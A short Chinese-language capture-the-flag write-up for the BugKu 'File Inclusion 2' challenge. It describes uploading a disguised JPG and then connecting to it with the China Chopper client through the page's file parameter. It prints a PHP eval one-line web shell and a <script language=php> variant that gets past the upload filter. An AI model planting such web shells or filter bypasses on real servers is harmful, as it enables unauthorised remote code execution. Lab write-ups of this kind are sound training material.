文件包含2-BugKu(方法一)

1.此题不是简单的文件包含读取,本来想着是直接读取文件,但是失败了。

2.我们试试上传一句话图片木马,新建一个jpg文件里面写入一句话木马<?php @eval($_POST['shell']); ?>然后上传之后访问发现存在过滤,将<?php替换成_。

文件包含2、BugKu

3.但是我们可以利用script标签绕过,写入<script language=php> @eval($_POST['shell']); </script>,上传之后没有错误显示。

4.我们这时候就可以直接用菜刀了,直接连接:http://123.206.31.85:49166/index.php?file=upload/201810300315094833.jpg密码:shell就可以访问目录了。

文件包含2、BugKu

 

文件包含2-BugKu(方法二):https://www.writeup.top/449.html

发表评论

电子邮件地址不会被公开。必填项已用 * 标注